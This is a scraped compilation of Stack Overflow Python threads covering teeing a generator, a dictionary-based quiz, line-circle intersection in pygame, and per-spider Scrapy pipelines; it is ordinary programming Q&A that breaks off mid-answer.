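    if status in (ChatMember.MEMBER, ChatMember.ADMINISTRATOR):
        known_chats.add(member.chat.id)      # bot was added or promoted
    else:
        known_chats.discard(member.chat.id)  # bot left or was removed

app = Application.builder().token("TOKEN").build()
app.add_handler(ChatMemberHandler(track_chats, ChatMemberHandler.MY_CHAT_MEMBER))
app.run_polling(allowed_updates=Update.ALL_TYPES)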
Q: Two functions, One generator I have two functions which both take iterators as inputs. Is there a way to write a generator which I can supply to both functions as input, which would not require a reset or a second pass through? I want to do one pass over the data, but supply the output to two functions: Example: def my_generator(data): for row in data: yield row gen = my_generator(data) func1(gen) func2(gen) I know I could have two different generator instances, or reset in between functions, but was wondering if there is a way to avoid doing two passes on the data. Note that func1/func2 themselves are NOT generators, which would be nice cause I could then have a pipeline. The point here is to try and avoid a second pass over the data. A: Python has an amazing catalog of handy functions. You find the ones related to iterators in itertools: import itertools def my_generator(data): for row in data: yield row gen = my_generator(data) gen1, gen2 = itertools.tee(gen) func1(gen1) func2(gen2) However, this only makes sense if func1 and func2 don't consume all the elements, because if they do itertools.tee()has to remember all the elements in genuntil gen2 is used. To get around this, use only a few elements at a time. Or change func1 to call func2. Or maybe even change func1 to be a lazy generator which returns the input and just pipe that into func2. A: You can either cache generators result into a list, or reset the generator to pass data into func2. The problem is that if one have 2 loops, one needs to iterate over the data twice, so either one loads the data again and create a generator or one caches the entire result. Solutions like itertools.tee will also just create 2 iteratvies, which is basically the same as resetting the generator after first iteration. Of course it is syntactic sugar but it won't change the situation in the background. If you have big data here, you have to merge func1 and func2. for a in gen: f1(a) f2(a) In practice it can be a good idea to design code like this, so one has full control over iteration process and is able associate/compose maps and filters using a single iterative. A: If using threads is an option, the generator may be consumed just once without having to store a possibly unpredictable number of yielded values between calls to the consumers. The following example runs the consumers in lock-step; Python 3.2 or later is needed for this implementation: import threading def generator(): for x in range(10): print('generating {}'.format(x)) yield x def tee(iterable, n=2): barrier = threading.Barrier(n) state = dict(value=None, stop_iteration=False) def repeat(): while True: if barrier.wait() == 0: try: state.update(value=next(iterable)) except StopIteration: state.update(stop_iteration=True) barrier.wait() if state['stop_iteration']: break yield state['value'] return tuple(repeat() for i in range(n)) def func1(iterable): for x in iterable: print('func1 consuming {}'.format(x)) def func2(iterable): for x in iterable: print('func2 consuming {}'.format(x)) gen1, gen2 = tee(generator(), 2) thread1 = threading.Thread(target=func1, args=(gen1,)) thread1.start() thread2 = threading.Thread(target=func2, args=(gen2,)) thread2.start() thread1.join() thread2.join() A: It is a little bit too late, but maybe will be helpful for someone. 
For simplicity I have added only one ChildClass, but the idea is to have multiple of them: class BaseClass: def on_yield(self, value: int): raise NotImplementedError() def summary(self): raise NotImplementedError() class ChildClass(BaseClass): def __init__(self): self._aggregated_value = 0 def on_yield(self, value: int): self._aggregated_value += value def summary(self): print(f"Aggregated value={self._aggregated_value}") class Generator(): def my_generator(self, data): for row in data: yield row def calculate(self, generator, classes): for index, value in enumerate(generator): print(f"index={index}") [_class.on_yield(value) for _class in classes] [_class.summary() for _class in classes] if __name__ == '__main__': child_classes = [ ChildClass(), ChildClass() ] generator = Generator() my_generator = generator.my_generator([1, 2, 3]) generator.calculate(my_generator, child_classes) The output of this is: index=0 index=1 index=2 Aggregated value=6 Aggregated value=6
Two functions, One generator
I have two functions which both take iterators as inputs. Is there a way to write a generator which I can supply to both functions as input, which would not require a reset or a second pass through? I want to do one pass over the data, but supply the output to two functions: Example: def my_generator(data): for row in data: yield row gen = my_generator(data) func1(gen) func2(gen) I know I could have two different generator instances, or reset in between functions, but was wondering if there is a way to avoid doing two passes on the data. Note that func1/func2 themselves are NOT generators, which would be nice cause I could then have a pipeline. The point here is to try and avoid a second pass over the data.
[ "Python has an amazing catalog of handy functions. You find the ones related to iterators in itertools:\nimport itertools\n\ndef my_generator(data):\n for row in data:\n yield row\n\ngen = my_generator(data)\ngen1, gen2 = itertools.tee(gen)\nfunc1(gen1)\nfunc2(gen2)\n\nHowever, this only makes sense if func1 and func2 don't consume all the elements, because if they do itertools.tee()has to remember all the elements in genuntil gen2 is used.\nTo get around this, use only a few elements at a time. Or change func1 to call func2. Or maybe even change func1 to be a lazy generator which returns the input and just pipe that into func2.\n", "You can either cache generators result into a list, or reset the generator to pass data into func2. The problem is that if one have 2 loops, one needs to iterate over the data twice, so either one loads the data again and create a generator or one caches the entire result. \nSolutions like itertools.tee will also just create 2 iteratvies, which is basically the same as resetting the generator after first iteration. Of course it is syntactic sugar but it won't change the situation in the background. \nIf you have big data here, you have to merge func1 and func2. \nfor a in gen:\n f1(a)\n f2(a)\n\nIn practice it can be a good idea to design code like this, so one has full control over iteration process and is able associate/compose maps and filters using a single iterative. \n", "If using threads is an option, the generator may be consumed just once without having to store a possibly unpredictable number of yielded values between calls to the consumers. The following example runs the consumers in lock-step; Python 3.2 or later is needed for this implementation:\nimport threading\n\n\ndef generator():\n for x in range(10):\n print('generating {}'.format(x))\n yield x\n\n\ndef tee(iterable, n=2):\n barrier = threading.Barrier(n)\n state = dict(value=None, stop_iteration=False)\n\n def repeat():\n while True:\n if barrier.wait() == 0:\n try:\n state.update(value=next(iterable))\n except StopIteration:\n state.update(stop_iteration=True)\n barrier.wait()\n if state['stop_iteration']:\n break\n yield state['value']\n\n return tuple(repeat() for i in range(n))\n\n\ndef func1(iterable):\n for x in iterable:\n print('func1 consuming {}'.format(x))\n\n\ndef func2(iterable):\n for x in iterable:\n print('func2 consuming {}'.format(x))\n\n\ngen1, gen2 = tee(generator(), 2)\n\nthread1 = threading.Thread(target=func1, args=(gen1,))\nthread1.start()\n\nthread2 = threading.Thread(target=func2, args=(gen2,))\nthread2.start()\n\nthread1.join()\nthread2.join()\n\n", "It is a little bit too late, but maybe will be helpful for someone. 
For simplicity I have added only one ChildClass, but the idea is to have multiple of them:\nclass BaseClass:\n def on_yield(self, value: int):\n raise NotImplementedError()\n def summary(self):\n raise NotImplementedError()\n\nclass ChildClass(BaseClass):\n def __init__(self):\n self._aggregated_value = 0\n def on_yield(self, value: int):\n self._aggregated_value += value\n def summary(self):\n print(f\"Aggregated value={self._aggregated_value}\")\n\nclass Generator():\n def my_generator(self, data):\n for row in data:\n yield row\n def calculate(self, generator, classes):\n for index, value in enumerate(generator):\n print(f\"index={index}\")\n [_class.on_yield(value) for _class in classes]\n [_class.summary() for _class in classes]\n\nif __name__ == '__main__':\n child_classes = [ ChildClass(), ChildClass() ]\n generator = Generator()\n my_generator = generator.my_generator([1, 2, 3])\n generator.calculate(my_generator, child_classes)\n\nThe output of this is:\nindex=0\nindex=1\nindex=2\nAggregated value=6\nAggregated value=6\n\n" ]
[ 3, 3, 3, 0 ]
[]
[]
[ "python" ]
stackoverflow_0035395429_python.txt
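For the generator question above, one way to package the single-pass pattern from the second answer, assuming func1 and func2 can be reduced to per-item callables:

def consume_once(iterable, *consumers):
    # single pass over the data; each consumer sees every item
    for item in iterable:
        for consume in consumers:
            consume(item)

totals = []
evens = []
consume_once(range(10), totals.append,
             lambda x: evens.append(x) if x % 2 == 0 else None)
print(sum(totals), evens)  # 45 [0, 2, 4, 6, 8]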
Q: What changes to make to get the question from the dictionary What changes should I make to get the question from a dictionary, get the answer at the same time, and check whether it is right or wrong? from random import * print("""Welcome to the quiz game
 would you like to play? """)
consent = input("-----> ")
consent = consent.lower()
if consent == "no":
    print("The game ends")
    quit()
else:
    print("Be ready to play")
    print("Answer the question in true and false")
points = 0

questions = ["Banana is a vegetable","Two plus two equals to four","Mumbai is the capital of present India","Tiger is an example of bird","punjab is a country"]
store = []
for ii in range(5):
    q1 = choice(questions)
    # q1.append(store)
    print(q1)
    ans1 = input("(True/False)----> ")
    ans1 = ans1.lower()
    if q1 == questions[0] and ans1 == "false":
        points += 1
    if q1 == questions[1] and ans1 == "true":
        points += 1
    if q1 == questions[2] and ans1 == "false":
        points += 1
    if q1 == questions[3] and ans1 == "false":
        points += 1
    if q1 == questions[4] and ans1 == "false":
        points += 1
print(f"your points are {points}")

Please suggest some changes to this code so it gets each question from a dictionary along with its answer at runtime. A: Make a dictionary where the key is a question and the value is the answer: quiz = { 'This is a true question': 'true', 'This is a false question': 'false', # and so on } Then choose a random question from the dictionary like this: question = choice(list(quiz)) print(question) And the correct answer will be quiz[question]. answer = input("type the answer: ").lower() if answer == quiz[question]: print("that is correct") else: print("wrong answer")
What changes to make to get the question from a dictionary
What changes to make to get the question from a dictionary and then get the answer at the same time and check whether it is right or wrong from random import * print("""Welcome to the quiz game would you like to play? """) consent = input("-----> ") consent = consent.lower() if consent == "no": print("The game ends") quit() else: print("Be ready to play") print("Answer the questions with true or false") points = 0 questions = ["Banana is a vegetable","Two plus two equals to four","Mumbai is the capital of present India","Tiger is an example of bird","punjab is a country"] store = [] for ii in range(5): q1 = choice(questions) # q1.append(store) print(q1) ans1 = input("(True/False)----> ") ans1.lower() if q1 == questions[0] and ans1 == "false": points += 1 if q1 == questions[1] and ans1 == "true": points += 1 if q1 == questions[2] and ans1 == "false": points += 1 if q1 == questions[3] and ans1 == "false": points += 1 if q1 == questions[4] and ans1 == "false": points += 1 print(f"your points are {points}") Suggest some changes to this code so that it gets the question from a dictionary and the answer at runtime
[ "Make a dictionary where the key is a question and the value is the answer:\nquiz = {\n 'This is a true question': 'true',\n 'This is a false question': 'false',\n # and so on\n}\n\nThen choose a random question from the dictionary like this:\nquestion = choice(list(quiz))\nprint(question)\n\nAnd the correct answer will be quiz[question].\nanswer = input(\"type the answer: \").lower()\nif answer == quiz[question]:\n print(\"that is correct\")\nelse:\n print(\"wrong answer\")\n\n" ]
[ 0 ]
[]
[]
[ "python" ]
stackoverflow_0074593096_python.txt
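A minimal sketch combining the dictionary from the answer above with the asker's scoring loop; the question texts and round count are illustrative only.

from random import choice

quiz = {
    "Banana is a vegetable": "false",
    "Two plus two equals four": "true",
    "Mumbai is the capital of present India": "false",
}

points = 0
for _ in range(3):
    question = choice(list(quiz))  # may repeat; use random.sample to avoid repeats
    print(question)
    answer = input("(True/False)----> ").lower()
    if answer == quiz[question]:
        points += 1
print(f"your points are {points}")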
Q: line collision detector with circles I recently started with Python and decided to make a path-planning program. Honestly, it has cost me a lot since I am a beginner, but to the point: the goal is to generate circles of random size and position that do not collide with each other, and then generate lines that do not collide with the circles. With much help I managed to generate the circles without collisions, but I cannot generate the lines, much less make them avoid the circles. I would greatly appreciate it if you could help me and tell me what is wrong or missing. This is my code, main: import pygame as pg from Circulo import Circulo from Linea import Linea from random import * class CreaCir: def __init__(self, figs): self.figs = figs def update(self): if len(self.figs) <70: choca = False r = randint(5, 104) x = randint(0, 600 + r) y = randint(0, 400 + r) creOne = Circulo(x, y, r) for fig in (self.figs): choca = creOne.colisionC(fig) if choca == True: break if choca == False: self.figs.append(creOne) def dibujar(self, ventana): pass class CreaLin: def __init__(self, lins): self.lins = lins def update(self): if len(self.lins) <70: choca = False x = randint(0, 700) y = randint(0, 500) a = randint(0, 700) b = randint(0, 500) linOne = Linea(x, y, a, b) for lin in (self.lins): choca = linOne.colisionL(lin) if choca == True: break if choca == False: self.lins.append(linOne) def dibujar(self, ventana): pass class Ventana: def __init__(self, Ven_Tam= (700, 500)): pg.init() self.ven_tam = Ven_Tam self.ven = pg.display.set_caption("Linea") self.ven = pg.display.set_mode(self.ven_tam) self.ven.fill(pg.Color('#404040')) self.figs = [] self.lins = [] self.reloj = pg.time.Clock() def check_events(self): for event in pg.event.get(): if event.type == pg.QUIT or (event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE): quit() pg.display.flip() def run(self): cirCreater = CreaCir(self.figs) linCreater = CreaLin(self.lins) while True: self.check_events() cirCreater.update() linCreater.update() for fig in self.figs: fig.dibujar(self.ven) for lin in self.lins: lin.dibujar(self.ven) self.reloj.tick(60) if __name__ == '__main__': ven = Ventana() ven.run() class Circulo: class Circulo(PosGeo): def __init__(self, x, y, r): self.x = x self.y = y self.radio = r self.cx = x+r self.cy = y+r def __str__(self): return f"Circulo, (X: {self.x}, Y: {self.y}), radio: {self.radio}" def dibujar(self, ventana): pg.draw.circle(ventana, "white", (self.cx, self.cy), self.radio, 1) pg.draw.line(ventana, "white", (self.cx+2, self.cy+2),(self.cx-2, self.cy-2)) pg.draw.line(ventana, "white", (self.cx-2, self.cy+2),(self.cx+2, self.cy-2)) def update(self): pass def colisionC(self, c2): return self.radio + c2.radio > sqrt(pow(self.cx - c2.cx, 2) + pow(self.cy - c2.cy, 2)) def colisionL(self, l1): den = sqrt(l1.a*l1.a+l1.b*l1.b) return abs(l1.a*self.cx+l1.b*self.cy+l1.c)/den < self.radio and finally my class line: class Linea(PosGeo): def __init__(self, x, y, a, b): super().__init__(x, y) self.x = x self.y = y self.a = a self.b = b def dibujar(self, ventana): pg.draw.line(ventana, "#7B0000", (self.x, self.y), (self.a, self.b)) def update(self): pass def colisionL(self, l1): pass A: Your algorithm that detects the intersection of a line and a circle is wrong. A correct algorithm can be found all over the web, e.g. Circle-Line Intersection. 
A function that implements such an algorithm and finds the intersection points of a line and a circle could look like the following: def sign(x): return -1 if x < 0 else 1 def interectLineCircle(l1, l2, cpt, r): x1 = l1[0] - cpt[0] y1 = l1[1] - cpt[1] x2 = l2[0] - cpt[0] y2 = l2[1] - cpt[1] dx = x2 - x1 dy = y2 - y1 dr = math.sqrt(dx*dx + dy*dy) D = x1 * y2 - x2 * y1 discriminant = r*r*dr*dr - D*D if discriminant < 0: return [] if discriminant == 0: return [((D * dy ) / (dr * dr) + cpt[0], (-D * dx ) / (dr * dr) + cpt[1])] xa = (D * dy + sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr) xb = (D * dy - sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr) ya = (-D * dx + abs(dy) * math.sqrt(discriminant)) / (dr * dr) yb = (-D * dx - abs(dy) * math.sqrt(discriminant)) / (dr * dr) return [(xa + cpt[0], ya + cpt[1]), (xb + cpt[0], yb + cpt[1])] If you just want to check if the line and the circle intersect, but you don't need the intersection points, you can simply return discriminant > 0: def interectLineCircle(l1, l2, cpt, r): x1 = l1[0] - cpt[0] y1 = l1[1] - cpt[1] x2 = l2[0] - cpt[0] y2 = l2[1] - cpt[1] dx = x2 - x1 dy = y2 - y1 dr = math.sqrt(dx*dx + dy*dy) D = x1 * y2 - x2 * y1 discriminant = r*r*dr*dr - D*D return discriminant > 0 If you want to check for line segments instead of endless lines, you must also check whether the intersection points are on the line segment: def interectLineCircle(l1, l2, cpt, r): x1 = l1[0] - cpt[0] y1 = l1[1] - cpt[1] x2 = l2[0] - cpt[0] y2 = l2[1] - cpt[1] dx = x2 - x1 dy = y2 - y1 dr = math.sqrt(dx*dx + dy*dy) D = x1 * y2 - x2 * y1 discriminant = r*r*dr*dr - D*D if discriminant < 0: return [] if discriminant == 0: xa = (D * dy ) / (dr * dr) ya = (-D * dx ) / (dr * dr) ta = (xa-x1)*dx/dr + (ya-y1)*dy/dr return [(xa + cpt[0], ya + cpt[1])] if 0 < ta < dr else [] xa = (D * dy + sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr) ya = (-D * dx + abs(dy) * math.sqrt(discriminant)) / (dr * dr) ta = (xa-x1)*dx/dr + (ya-y1)*dy/dr xpt = [(xa + cpt[0], ya + cpt[1])] if 0 < ta < dr else [] xb = (D * dy - sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr) yb = (-D * dx - abs(dy) * math.sqrt(discriminant)) / (dr * dr) tb = (xb-x1)*dx/dr + (yb-y1)*dy/dr xpt += [(xb + cpt[0], yb + cpt[1])] if 0 < tb < dr else [] return xpt Complete example: import pygame, math window = pygame.display.set_mode((500, 300)) l1 = [50, 0] l2 = [450, 300] r = 50 def sign(x): return -1 if x < 0 else 1 def interectLineCircle(l1, l2, cpt, r): x1 = l1[0] - cpt[0] y1 = l1[1] - cpt[1] x2 = l2[0] - cpt[0] y2 = l2[1] - cpt[1] dx = x2 - x1 dy = y2 - y1 dr = math.sqrt(dx*dx + dy*dy) D = x1 * y2 - x2 * y1 discriminant = r*r*dr*dr - D*D if discriminant < 0: return [] if discriminant == 0: return [((D * dy ) / (dr * dr) + cpt[0], (-D * dx ) / (dr * dr) + cpt[1])] xa = (D * dy + sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr) xb = (D * dy - sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr) ya = (-D * dx + abs(dy) * math.sqrt(discriminant)) / (dr * dr) yb = (-D * dx - abs(dy) * math.sqrt(discriminant)) / (dr * dr) return [(xa + cpt[0], ya + cpt[1]), (xb + cpt[0], yb + cpt[1])] clock = pygame.time.Clock() run = True while run: clock.tick(250) for event in pygame.event.get(): if event.type == pygame.QUIT: run = False cpt = pygame.mouse.get_pos() isect = interectLineCircle(l1, l2, cpt, r) window.fill("black") pygame.draw.line(window, "white", l1, l2, 3) pygame.draw.circle(window, "white", cpt, r, 3) for p in isect: pygame.draw.circle(window, "red", p, 5) pygame.display.flip() pygame.quit() exit()
line collision detector with circles
I recently started with Python and decided to make a path-planning program. Honestly, it has cost me a lot since I am a beginner, but to the point: the goal is to generate circles of random size and position that do not collide with each other, and then generate lines that do not collide with the circles. With much help I managed to generate the circles without collisions, but I cannot generate the lines, much less make them avoid the circles. I would greatly appreciate it if you could help me and tell me what is wrong or missing. This is my code, main: import pygame as pg from Circulo import Circulo from Linea import Linea from random import * class CreaCir: def __init__(self, figs): self.figs = figs def update(self): if len(self.figs) <70: choca = False r = randint(5, 104) x = randint(0, 600 + r) y = randint(0, 400 + r) creOne = Circulo(x, y, r) for fig in (self.figs): choca = creOne.colisionC(fig) if choca == True: break if choca == False: self.figs.append(creOne) def dibujar(self, ventana): pass class CreaLin: def __init__(self, lins): self.lins = lins def update(self): if len(self.lins) <70: choca = False x = randint(0, 700) y = randint(0, 500) a = randint(0, 700) b = randint(0, 500) linOne = Linea(x, y, a, b) for lin in (self.lins): choca = linOne.colisionL(lin) if choca == True: break if choca == False: self.lins.append(linOne) def dibujar(self, ventana): pass class Ventana: def __init__(self, Ven_Tam= (700, 500)): pg.init() self.ven_tam = Ven_Tam self.ven = pg.display.set_caption("Linea") self.ven = pg.display.set_mode(self.ven_tam) self.ven.fill(pg.Color('#404040')) self.figs = [] self.lins = [] self.reloj = pg.time.Clock() def check_events(self): for event in pg.event.get(): if event.type == pg.QUIT or (event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE): quit() pg.display.flip() def run(self): cirCreater = CreaCir(self.figs) linCreater = CreaLin(self.lins) while True: self.check_events() cirCreater.update() linCreater.update() for fig in self.figs: fig.dibujar(self.ven) for lin in self.lins: lin.dibujar(self.ven) self.reloj.tick(60) if __name__ == '__main__': ven = Ventana() ven.run() class Circulo: class Circulo(PosGeo): def __init__(self, x, y, r): self.x = x self.y = y self.radio = r self.cx = x+r self.cy = y+r def __str__(self): return f"Circulo, (X: {self.x}, Y: {self.y}), radio: {self.radio}" def dibujar(self, ventana): pg.draw.circle(ventana, "white", (self.cx, self.cy), self.radio, 1) pg.draw.line(ventana, "white", (self.cx+2, self.cy+2),(self.cx-2, self.cy-2)) pg.draw.line(ventana, "white", (self.cx-2, self.cy+2),(self.cx+2, self.cy-2)) def update(self): pass def colisionC(self, c2): return self.radio + c2.radio > sqrt(pow(self.cx - c2.cx, 2) + pow(self.cy - c2.cy, 2)) def colisionL(self, l1): den = sqrt(l1.a*l1.a+l1.b*l1.b) return abs(l1.a*self.cx+l1.b*self.cy+l1.c)/den < self.radio and finally my class line: class Linea(PosGeo): def __init__(self, x, y, a, b): super().__init__(x, y) self.x = x self.y = y self.a = a self.b = b def dibujar(self, ventana): pg.draw.line(ventana, "#7B0000", (self.x, self.y), (self.a, self.b)) def update(self): pass def colisionL(self, l1): pass
[ "Your algorithm that detects the intersection of a line and a circle is wrong.A correct algorithm can be found all over the web. e.g. Circle-Line Intersection. A function that implements such an algorithm and finds the intersection points of a line and a circle could look like the following:\ndef sign(x):\n return -1 if x < 0 else 1\n\ndef interectLineCircle(l1, l2, cpt, r):\n x1 = l1[0] - cpt[0]\n y1 = l1[1] - cpt[1]\n x2 = l2[0] - cpt[0]\n y2 = l2[1] - cpt[1]\n dx = x2 - x1\n dy = y2 - y1\n dr = math.sqrt(dx*dx + dy*dy)\n D = x1 * y2 - x2 * y1\n discriminant = r*r*dr*dr - D*D\n if discriminant < 0:\n return []\n if discriminant == 0:\n return [((D * dy ) / (dr * dr) + cpt[0], (-D * dx ) / (dr * dr) + cpt[1])]\n xa = (D * dy + sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr)\n xb = (D * dy - sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr)\n ya = (-D * dx + abs(dy) * math.sqrt(discriminant)) / (dr * dr)\n yb = (-D * dx - abs(dy) * math.sqrt(discriminant)) / (dr * dr)\n return [(xa + cpt[0], ya + cpt[1]), (xb + cpt[0], yb + cpt[1])]\n\nIf you just want to check if the line and the circle intersect, but you don't need the intersection points, you can simply return discriminant > 0:\ndef interectLineCircle(l1, l2, cpt, r):\n x1 = l1[0] - cpt[0]\n y1 = l1[1] - cpt[1]\n x2 = l2[0] - cpt[0]\n y2 = l2[1] - cpt[1]\n dx = x2 - x1\n dy = y2 - y1\n dr = math.sqrt(dx*dx + dy*dy)\n D = x1 * y2 - x2 * y1\n discriminant = r*r*dr*dr - D*D\n return discriminant > 0\n\nIf you want to check for line segments instead of endless lines, you must also check whether the intersection points are on the line segment:\ndef interectLineCircle(l1, l2, cpt, r):\n x1 = l1[0] - cpt[0]\n y1 = l1[1] - cpt[1]\n x2 = l2[0] - cpt[0]\n y2 = l2[1] - cpt[1]\n dx = x2 - x1\n dy = y2 - y1\n dr = math.sqrt(dx*dx + dy*dy)\n D = x1 * y2 - x2 * y1\n discriminant = r*r*dr*dr - D*D\n if discriminant < 0:\n return []\n if discriminant == 0:\n xa = (D * dy ) / (dr * dr)\n ya = (-D * dx ) / (dr * dr)\n ta = (xa-x1)*dx/dr + (ya-y1)*dy/dr\n return [(xa + cpt[0], ya + cpt[1])] if 0 < ta < dr else []\n \n xa = (D * dy + sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr)\n ya = (-D * dx + abs(dy) * math.sqrt(discriminant)) / (dr * dr)\n ta = (xa-x1)*dx/dr + (ya-y1)*dy/dr\n xpt = [(xa + cpt[0], ya + cpt[1])] if 0 < ta < dr else []\n \n xb = (D * dy - sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr) \n yb = (-D * dx - abs(dy) * math.sqrt(discriminant)) / (dr * dr)\n tb = (xb-x1)*dx/dr + (yb-y1)*dy/dr\n xpt += [(xb + cpt[0], yb + cpt[1])] if 0 < tb < dr else []\n return xpt\n\n\nComplete example:\n\nimport pygame, math\n\nwindow = pygame.display.set_mode((500, 300))\n\nl1 = [50, 0]\nl2 = [450, 300]\nr = 50\n\ndef sign(x):\n return -1 if x < 0 else 1\n\ndef interectLineCircle(l1, l2, cpt, r):\n x1 = l1[0] - cpt[0]\n y1 = l1[1] - cpt[1]\n x2 = l2[0] - cpt[0]\n y2 = l2[1] - cpt[1]\n dx = x2 - x1\n dy = y2 - y1\n dr = math.sqrt(dx*dx + dy*dy)\n D = x1 * y2 - x2 * y1\n discriminant = r*r*dr*dr - D*D\n if discriminant < 0:\n return []\n if discriminant == 0:\n return [((D * dy ) / (dr * dr) + cpt[0], (-D * dx ) / (dr * dr) + cpt[1])]\n xa = (D * dy + sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr)\n xb = (D * dy - sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr)\n ya = (-D * dx + abs(dy) * math.sqrt(discriminant)) / (dr * dr)\n yb = (-D * dx - abs(dy) * math.sqrt(discriminant)) / (dr * dr)\n return [(xa + cpt[0], ya + cpt[1]), (xb + cpt[0], yb + cpt[1])]\n\nclock = pygame.time.Clock()\nrun = True\nwhile run:\n clock.tick(250)\n 
for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n cpt = pygame.mouse.get_pos()\n isect = interectLineCircle(l1, l2, cpt, r)\n \n window.fill(\"black\")\n pygame.draw.line(window, \"white\", l1, l2, 3)\n pygame.draw.circle(window, \"white\", cpt, r, 3)\n for p in isect:\n pygame.draw.circle(window, \"red\", p, 5)\n pygame.display.flip()\n\npygame.quit()\nexit()\n\n" ]
[ 1 ]
[]
[]
[ "pygame", "python" ]
stackoverflow_0074592905_pygame_python.txt
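An alternative, simpler boolean test that could back the asker's Circulo.colisionL: project the circle centre onto the segment and compare the closest distance to the radius. The function name and the way it would be wired into the asker's classes are assumptions.

import math

def segment_hits_circle(p1, p2, center, r):
    # Vector along the segment and its squared length
    dx, dy = p2[0] - p1[0], p2[1] - p1[1]
    norm = dx * dx + dy * dy
    if norm == 0:  # degenerate segment: a single point
        return math.hypot(p1[0] - center[0], p1[1] - center[1]) < r
    # Parameter of the closest point on the line, clamped to the segment
    t = ((center[0] - p1[0]) * dx + (center[1] - p1[1]) * dy) / norm
    t = max(0.0, min(1.0, t))
    cx, cy = p1[0] + t * dx, p1[1] + t * dy
    return math.hypot(cx - center[0], cy - center[1]) < r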
Q: How can I use different pipelines for different spiders in a single Scrapy project I have a scrapy project which contains multiple spiders. Is there any way I can define which pipelines to use for which spider? Not all the pipelines i have defined are applicable for every spider. Thanks A: Just remove all pipelines from main settings and use this inside spider. This will define the pipeline to user per spider class testSpider(InitSpider): name = 'test' custom_settings = { 'ITEM_PIPELINES': { 'app.MyPipeline': 400 } } A: Building on the solution from Pablo Hoffman, you can use the following decorator on the process_item method of a Pipeline object so that it checks the pipeline attribute of your spider for whether or not it should be executed. For example: def check_spider_pipeline(process_item_method): @functools.wraps(process_item_method) def wrapper(self, item, spider): # message template for debugging msg = '%%s %s pipeline step' % (self.__class__.__name__,) # if class is in the spider's pipeline, then use the # process_item method normally. if self.__class__ in spider.pipeline: spider.log(msg % 'executing', level=log.DEBUG) return process_item_method(self, item, spider) # otherwise, just return the untouched item (skip this step in # the pipeline) else: spider.log(msg % 'skipping', level=log.DEBUG) return item return wrapper For this decorator to work correctly, the spider must have a pipeline attribute with a container of the Pipeline objects that you want to use to process the item, for example: class MySpider(BaseSpider): pipeline = set([ pipelines.Save, pipelines.Validate, ]) def parse(self, response): # insert scrapy goodness here return item And then in a pipelines.py file: class Save(object): @check_spider_pipeline def process_item(self, item, spider): # do saving here return item class Validate(object): @check_spider_pipeline def process_item(self, item, spider): # do validating here return item All Pipeline objects should still be defined in ITEM_PIPELINES in settings (in the correct order -- would be nice to change so that the order could be specified on the Spider, too). A: The other solutions given here are good, but I think they could be slow, because we are not really not using the pipeline per spider, instead we are checking if a pipeline exists every time an item is returned (and in some cases this could reach millions). A good way to completely disable (or enable) a feature per spider is using custom_setting and from_crawler for all extensions like this: pipelines.py from scrapy.exceptions import NotConfigured class SomePipeline(object): def __init__(self): pass @classmethod def from_crawler(cls, crawler): if not crawler.settings.getbool('SOMEPIPELINE_ENABLED'): # if this isn't specified in settings, the pipeline will be completely disabled raise NotConfigured return cls() def process_item(self, item, spider): # change my item return item settings.py ITEM_PIPELINES = { 'myproject.pipelines.SomePipeline': 300, } SOMEPIPELINE_ENABLED = True # you could have the pipeline enabled by default spider1.py class Spider1(Spider): name = 'spider1' start_urls = ["http://example.com"] custom_settings = { 'SOMEPIPELINE_ENABLED': False } As you check, we have specified custom_settings that will override the things specified in settings.py, and we are disabling SOMEPIPELINE_ENABLED for this spider. 
Now when you run this spider, check for something like: [scrapy] INFO: Enabled item pipelines: [] Now scrapy has completely disabled the pipeline, not bothering of its existence for the whole run. Check that this also works for scrapy extensions and middlewares. A: You can use the name attribute of the spider in your pipeline class CustomPipeline(object) def process_item(self, item, spider) if spider.name == 'spider1': # do something return item return item Defining all pipelines this way can accomplish what you want. A: I can think of at least four approaches: Use a different scrapy project per set of spiders+pipelines (might be appropriate if your spiders are different enough warrant being in different projects) On the scrapy tool command line, change the pipeline setting with scrapy settings in between each invocation of your spider Isolate your spiders into their own scrapy tool commands, and define the default_settings['ITEM_PIPELINES'] on your command class to the pipeline list you want for that command. See line 6 of this example. In the pipeline classes themselves, have process_item() check what spider it's running against, and do nothing if it should be ignored for that spider. See the example using resources per spider to get you started. (This seems like an ugly solution because it tightly couples spiders and item pipelines. You probably shouldn't use this one.) A: The most simple and effective solution is to set custom settings in each spider itself. custom_settings = {'ITEM_PIPELINES': {'project_name.pipelines.SecondPipeline': 300}} After that you need to set them in the settings.py file ITEM_PIPELINES = { 'project_name.pipelines.FistPipeline': 300, 'project_name.pipelines.SecondPipeline': 400 } in that way each spider will use the respective pipeline. A: You can just set the item pipelines settings inside of the spider like this: class CustomSpider(Spider): name = 'custom_spider' custom_settings = { 'ITEM_PIPELINES': { '__main__.PagePipeline': 400, '__main__.ProductPipeline': 300, }, 'CONCURRENT_REQUESTS_PER_DOMAIN': 2 } I can then split up a pipeline (or even use multiple pipelines) by adding a value to the loader/returned item that identifies which part of the spider sent items over. This way I won’t get any KeyError exceptions and I know which items should be available. ... def scrape_stuff(self, response): pageloader = PageLoader( PageItem(), response=response) pageloader.add_xpath('entire_page', '/html//text()') pageloader.add_value('item_type', 'page') yield pageloader.load_item() productloader = ProductLoader( ProductItem(), response=response) productloader.add_xpath('product_name', '//span[contains(text(), "Example")]') productloader.add_value('item_type', 'product') yield productloader.load_item() class PagePipeline: def process_item(self, item, spider): if item['item_type'] == 'product': # do product stuff if item['item_type'] == 'page': # do page stuff A: I am using two pipelines, one for image download (MyImagesPipeline) and second for save data in mongodb (MongoPipeline). 
